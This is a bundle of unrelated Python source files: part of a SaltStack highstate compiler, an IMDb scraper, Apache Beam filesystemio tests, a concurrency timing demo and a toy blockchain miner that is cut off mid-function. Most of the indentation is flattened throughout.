if not isinstance(s_dec, str):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
                        # Includes or excludes given as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(iter(arg.keys())) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], str):
                    # If this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {} in SLS {} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in SLS '{}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
"Extension name '{}' in SLS '{}' is "
"not a dictionary".format(name, sls)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = "Exclude Declaration in SLS {} is not formed " "as a list".format(
sls
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches, context=None):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in matches.items():
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{}' found".format(saltenv)
)
                # If we did not find any sls in the fileserver listing, it may be
                # because the sls was generated or added later; try to execute it
                # directly, and if that fails it will return the same error anyway.
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{}:{}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(
sls, saltenv, mods, matches, context=context
)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{}' "
"in env '{}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (ext.items() for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{}' and is found in SLS"
" '{}:{}' and SLS '{}:{}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
# File exists so continue
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += str(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, str):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except OSError:
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
env_matches = matches.get(saltenv)
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState:
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
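# A minimal usage sketch (hedged; assumes a loaded minion configuration, and the
# config path below is illustrative only):
#
#     opts = salt.config.minion_config('/etc/salt/minion')
#     st_ = HighState(opts)
#     st_.push_active()
#     try:
#         ret = st_.call_highstate()
#     finally:
#         HighState.pop_active()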
|
movie.py
|
import csv
import logging
import threading
import unicodedata
import requests
from bs4 import BeautifulSoup
class Model():
count = 0
def __init__(self):
        # Request headers
self.headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/65.0.3325.162 Safari/537.36 '
}
        # Maps each movie's id to its IMDb id
self.movie_dct = {}
        # Movie ids that have already been processed
self.white_lst = []
        # Base URL for the movie detail pages
self.url = 'https://www.imdb.com/title/'
self.movie_csv_path = 'data/links.csv'
        # File the scraped movie info is saved to
self.info_save_path = 'info.csv'
        # logging configuration: write the run log to a file
logging.basicConfig(filename="run.log", filemode="a+", format="%(asctime)s %(name)s:%(levelname)s:%(message)s",
datefmt="%Y-%m-%d %H:%M:%S", level=logging.ERROR)
        # The movie currently being processed
self.cur_movie_id = None
self.cur_imdb_id = None
def get_white_lst(self):
        '''Load the whitelist of already-processed movie ids'''
with open('white_list') as fb:
for line in fb:
line = line.strip()
self.white_lst.append(line)
def get_movie_id(self):
        '''Load the movie ids and their IMDb ids'''
with open(self.movie_csv_path) as fb:
fb.readline()
for line in fb:
line = line.strip()
line = line.split(',')
                # movie id -> imdb id
self.movie_dct[line[0]] = line[1]
def update_white_lst(self, movie_id):
        '''Append a processed movie id to the whitelist'''
with open('white_list', 'a+') as fb:
fb.write(movie_id + '\n')
def update_black_lst(self, movie_id, msg=''):
with open('black_list.txt', 'a+') as fb:
            # Write the movie id and imdb id along with the error reason
            # msg=1: the URL is dead, msg=2: the movie has no poster
fb.write(movie_id + ' ' + self.movie_dct[movie_id] + ' ' + msg + '\n')
def get_url_response(self, url):
        '''Request the URL and return the response'''
logging.info(f'get {url}')
i = 0
        # Retry on timeout, at most 5 times
while i < 5:
try:
response = requests.get(url, timeout=6, headers=self.headers)
if response.status_code == 200:
                    logging.info(f'get {url} success')
                    # Fetched successfully, return the response
return response
                # If the status code is wrong the fetch failed; return None and stop retrying
return None
except requests.RequestException:
                # Timed out or the request failed
i += 1
logging.error(f'get {url} error')
        # All 5 retries failed, return None
return None
def process_html(self, html):
        '''Parse the html and extract the poster and movie info'''
soup = BeautifulSoup(html, 'lxml')
        # Movie title
name = soup.find('h1').get_text()
        # Strip html whitespace characters such as \x20
name = unicodedata.normalize('NFKC', name)
        # Basic movie info, e.g. 1h 21min | Animation, Adventure, Comedy | 21 March 1996 (Germany)
info = []
        # Year, rating (e.g. G), runtime
msg = soup.find_all('li', class_="ipc-inline-list__item")
if msg[0].span is None:
info.append(msg[0].get_text())
else:
info.append(msg[0].span.get_text())
if msg[1].span is None:
info.append(msg[1].get_text())
else:
info.append(msg[1].span.get_text())
if msg[2].span is None:
info.append(msg[2].get_text())
else:
info.append(msg[2].span.get_text())
        # Basic info and detailed release date, e.g. Animation, Adventure, Comedy | 21 March 1996 (Germany)
for tag in soup.find_all(class_="ipc-chip__text"):
info.append(tag.get_text().strip())
info.pop(len(info) - 1)
        # Synopsis
intro = soup.find(class_='GenresAndPlot__TextContainerBreakpointXS_TO_M-cum89p-0 dcFkRD').get_text().strip()
intro = unicodedata.normalize('NFKC', intro)
        # Cast. D, W, S stand for director, writer and star respectively
case_dict = {'D': [], 'W': [], 'S': []}
msg = soup.find_all(class_="ipc-metadata-list-item__content-container")
case_dict['D'].append(msg[0].get_text())
for li in msg[1].ul:
case_dict['W'].append(li.get_text())
for writer in soup.find_all(class_="StyledComponents__ActorName-y9ygcu-1 eyqFnv"):
case_dict['S'].append(writer.get_text())
        # id, title, poster link, runtime, genres, release date, synopsis, directors, writers, stars
print(self.cur_movie_id)
detail = [self.cur_movie_id, name, info[0], '|'.join(info[1:-1]),
info[-1], intro,
'|'.join(case_dict['D']), '|'.join(case_dict['W']), '|'.join(case_dict['S'])]
self.save_info(detail)
def save_info(self, detail):
        # Append a row to the CSV file
with open(f'{self.info_save_path}', 'a+', encoding='utf-8', newline='') as fb:
writer = csv.writer(fb)
writer.writerow(detail)
def run(self, num):
        # Start crawling
        # Load the whitelist and the movie id mapping first
self.get_white_lst()
self.get_movie_id()
movies = list(enumerate(self.movie_dct.items()))
step = 9
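        # Sharding: the __main__ block below starts 9 Model instances, each with a
        # distinct `num` in 0..8, so this worker only handles the movies at
        # indices num, num + 9, num + 18, ... of the csv listing.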
begin = num
for i in range(begin, len(movies), step):
if movies[i][1][0] in self.white_lst:
continue
self.cur_movie_id = movies[i][1][0]
self.cur_imdb_id = movies[i][1][1]
response = self.get_url_response(self.url + 'tt' + self.cur_imdb_id)
if response is None:
                self.save_info([self.cur_movie_id] + [''] * 9)  # pad the remaining fields with empty strings
                # Still update the whitelist so these failed movies are not re-crawled
self.update_white_lst(self.cur_movie_id)
                # Update the blacklist; these entries are reprocessed later by another script
self.update_black_lst(self.cur_movie_id, '1')
continue
            # Process the movie detail page
try:
self.process_html(response.content)
            except TypeError as e:
                logging.error(f'process movie {self.cur_movie_id} failed: {e}')
            # Done processing; add the movie id to the whitelist
self.update_white_lst(self.cur_movie_id)
logging.info(f'process movie {self.cur_movie_id} success')
if __name__ == '__main__':
s = Model()
s1 = Model()
s2 = Model()
s3 = Model()
s4 = Model()
s5 = Model()
s6 = Model()
s7 = Model()
s8 = Model()
threading.Thread(target=s.run, name=None, args=([0])).start()
threading.Thread(target=s1.run, name=None, args=([1])).start()
threading.Thread(target=s2.run, name=None, args=([2])).start()
threading.Thread(target=s3.run, name=None, args=([3])).start()
threading.Thread(target=s4.run, name=None, args=([4])).start()
threading.Thread(target=s5.run, name=None, args=([5])).start()
threading.Thread(target=s6.run, name=None, args=([6])).start()
threading.Thread(target=s7.run, name=None, args=([7])).start()
threading.Thread(target=s8.run, name=None, args=([8])).start()
|
filesystemio_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for filesystemio."""
# pytype: skip-file
from __future__ import absolute_import
import io
import logging
import multiprocessing
import os
import threading
import unittest
from builtins import range
from apache_beam.io import filesystemio
_LOGGER = logging.getLogger(__name__)
class FakeDownloader(filesystemio.Downloader):
def __init__(self, data):
self._data = data
self.last_read_size = -1
@property
def size(self):
return len(self._data)
def get_range(self, start, end):
self.last_read_size = end - start
return self._data[start:end]
class FakeUploader(filesystemio.Uploader):
def __init__(self):
self.data = b''
self.last_write_size = -1
self.finished = False
def last_error(self):
return None
def put(self, data):
assert not self.finished
self.data += data.tobytes()
self.last_write_size = len(data)
def finish(self):
self.finished = True
class TestDownloaderStream(unittest.TestCase):
def test_file_attributes(self):
downloader = FakeDownloader(data=None)
stream = filesystemio.DownloaderStream(downloader)
self.assertEqual(stream.mode, 'rb')
self.assertTrue(stream.readable())
self.assertFalse(stream.writable())
self.assertTrue(stream.seekable())
def test_read_empty(self):
downloader = FakeDownloader(data=b'')
stream = filesystemio.DownloaderStream(downloader)
self.assertEqual(stream.read(), b'')
def test_read(self):
data = b'abcde'
downloader = FakeDownloader(data)
stream = filesystemio.DownloaderStream(downloader)
# Read size is exactly what was passed to read() (unbuffered).
self.assertEqual(stream.read(1), data[0:1])
self.assertEqual(downloader.last_read_size, 1)
self.assertEqual(stream.read(), data[1:])
self.assertEqual(downloader.last_read_size, len(data) - 1)
def test_read_buffered(self):
data = b'abcde'
downloader = FakeDownloader(data)
buffer_size = 2
stream = io.BufferedReader(
filesystemio.DownloaderStream(downloader), buffer_size)
# Verify that buffering works and is reading ahead.
self.assertEqual(stream.read(1), data[0:1])
self.assertEqual(downloader.last_read_size, buffer_size)
self.assertEqual(stream.read(), data[1:])
class TestUploaderStream(unittest.TestCase):
def test_file_attributes(self):
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
self.assertEqual(stream.mode, 'wb')
self.assertFalse(stream.readable())
self.assertTrue(stream.writable())
self.assertFalse(stream.seekable())
def test_write_empty(self):
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
data = b''
stream.write(memoryview(data))
self.assertEqual(uploader.data, data)
def test_write(self):
data = b'abcde'
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
# Unbuffered writes.
stream.write(memoryview(data[0:1]))
self.assertEqual(uploader.data[0], data[0])
self.assertEqual(uploader.last_write_size, 1)
stream.write(memoryview(data[1:]))
self.assertEqual(uploader.data, data)
self.assertEqual(uploader.last_write_size, len(data) - 1)
def test_write_buffered(self):
data = b'abcde'
uploader = FakeUploader()
buffer_size = 2
stream = io.BufferedWriter(
filesystemio.UploaderStream(uploader), buffer_size)
# Verify that buffering works: doesn't write to uploader until buffer is
# filled.
stream.write(data[0:1])
self.assertEqual(-1, uploader.last_write_size)
stream.write(data[1:])
stream.close()
self.assertEqual(data, uploader.data)
class TestPipeStream(unittest.TestCase):
def _read_and_verify(self, stream, expected, buffer_size, success):
data_list = []
bytes_read = 0
seen_last_block = False
while True:
data = stream.read(buffer_size)
self.assertLessEqual(len(data), buffer_size)
if len(data) < buffer_size:
# Test the constraint that the pipe stream returns less than the buffer
# size only when at the end of the stream.
if data:
self.assertFalse(seen_last_block)
seen_last_block = True
if not data:
break
data_list.append(data)
bytes_read += len(data)
self.assertEqual(stream.tell(), bytes_read)
self.assertEqual(b''.join(data_list), expected)
success[0] = True
def _read_and_seek(self, stream, expected, buffer_size, success):
data_list = []
bytes_read = 0
while True:
data = stream.read(buffer_size)
# Test bad seek positions.
with self.assertRaises(NotImplementedError):
stream.seek(bytes_read + 1)
with self.assertRaises(NotImplementedError):
stream.seek(bytes_read - 1)
# Rewind stream and test that it reads back the same data again.
stream.seek(bytes_read)
data2 = stream.read(buffer_size)
self.assertEqual(data, data2)
if not data:
break
data_list.append(data)
bytes_read += len(data)
self.assertEqual(stream.tell(), bytes_read)
self.assertEqual(len(b''.join(data_list)), len(expected))
self.assertEqual(b''.join(data_list), expected)
success[0] = True
def test_pipe_stream(self):
block_sizes = list(4**i for i in range(0, 12))
data_blocks = list(os.urandom(size) for size in block_sizes)
expected = b''.join(data_blocks)
buffer_sizes = [100001, 512 * 1024, 1024 * 1024]
for buffer_size in buffer_sizes:
for target in [self._read_and_verify, self._read_and_seek]:
_LOGGER.info('buffer_size=%s, target=%s' % (buffer_size, target))
parent_conn, child_conn = multiprocessing.Pipe()
stream = filesystemio.PipeStream(child_conn)
success = [False]
child_thread = threading.Thread(
target=target, args=(stream, expected, buffer_size, success))
child_thread.start()
for data in data_blocks:
parent_conn.send_bytes(data)
parent_conn.close()
child_thread.join()
self.assertTrue(success[0], 'error in test thread')
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
demo.py
|
#!/usr/bin/env python3
"""
simple example of coroutine vs. threading vs. processes
timing on old Windows laptop:
python demo.py c => 2.3 sec.
python demo.py t => 2.5 sec.
python demo.py p => 0.9 sec.
We didn't break out worker setup time from computation time.
In real-world situations, coroutines can be faster and less resource-consuming than threads.
There is no one best choice for all task types; we fit the asynchronous architecture to the task.
There are numerous other popular implementations of threading and coroutines beyond the built-in modules used here.
In computation-bound programs like this example, coroutines and threads would generally not be as good a choice
as multiprocessing. However, the heavier resource usage of multiprocessing is not necessarily best for IO-bound tasks
such as waiting for network connections, where coroutines and/or threads are often a better choice.
"""
import threading
import time
import math
import multiprocessing
import asyncio
import sys
from argparse import ArgumentParser
async def coro_worker(i: int, Niter: int, tic: float):
"""coroutine worker"""
for _ in range(Niter):
math.sin(3)
print(f"Coroutine worker {i} done at {time.monotonic() - tic:.2f} sec.")
async def coro(Nworker: int, Niter: int, tic: float):
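    # asyncio.create_task() was added in Python 3.7; asyncio.ensure_future() is
    # the older spelling, hence the version check below.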
if sys.version_info >= (3, 7):
tasks = [asyncio.create_task(coro_worker(i, Niter, tic)) for i in range(Nworker)]
else:
tasks = [asyncio.ensure_future(coro_worker(i, Niter, tic)) for i in range(Nworker)]
await asyncio.wait(tasks)
class Thread_worker(threading.Thread):
"""threading worker"""
def __init__(self, i: int, Niter: int):
super(Thread_worker, self).__init__()
self.Niter = Niter
self.i = i
def run(self):
tic = time.monotonic()
for _ in range(self.Niter):
math.sin(3)
        print(f"Thread worker {self.i} done at {time.monotonic() - tic:.2f} sec.")
def mp_worker(i: int, Niter: int, tic: float):
""" multiprocessing worker"""
for _ in range(Niter):
math.sin(3)
print(f"Process worker {i} done at {time.monotonic() - tic:.2f} sec.")
if __name__ == "__main__":
P = ArgumentParser(
        description="Demonstrate differences between coroutines, threads and processes."
)
P.add_argument(
"method", choices=["c", "t", "p"], help="c: coroutine, t: threading, p: multiprocessing"
)
P.add_argument("-Nworker", help="number of workers", type=int, default=4)
P.add_argument(
"-Niter", help="number of loop iterations (arbitrary)", type=int, default=5000000,
)
A = P.parse_args()
ps = []
ts = []
tic = time.monotonic()
for i in range(A.Nworker):
if A.method == "t":
t = Thread_worker(i, A.Niter)
t.start()
ts.append(t)
elif A.method == "p":
p = multiprocessing.Process(target=mp_worker, args=(i, A.Niter, tic))
p.start()
ps.append(p)
if A.method == "c":
asyncio.run(coro(A.Nworker, A.Niter, tic))
elif A.method == "p":
for p in ps:
p.join()
elif A.method == "t":
for t in ts:
t.join()
print(f"Elapsed wallclock time: {time.monotonic() - tic:.2f} sec.")
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
        by storing that block's unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction to adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
    # Keep incrementing until the value is divisible both by 7919 and by the
    # proof of work of the previous block in the chain
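    # Worked example: with last_proof == 9 (the genesis proof), the loop stops at
    # 9 * 7919 = 71271, the smallest number above 9 divisible by both 9 and the
    # prime 7919.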
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
        # Every 60 seconds, check whether some other node already found the solution
if int((time.time()-start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
        To prevent too many coins from being created, the process
        is slowed down by a proof-of-work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(url = MINER_NODE_URL + '/txion', params = {'update':MINER_ADDRESS}).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": new_block_timestamp,
"data": new_block_data,
"hash": last_block_hash
}, sort_keys=True) + "\n")
a.send(BLOCKCHAIN)
requests.get(url = MINER_NODE_URL + '/blocks', params = {'update':MINER_ADDRESS})
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(url = node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
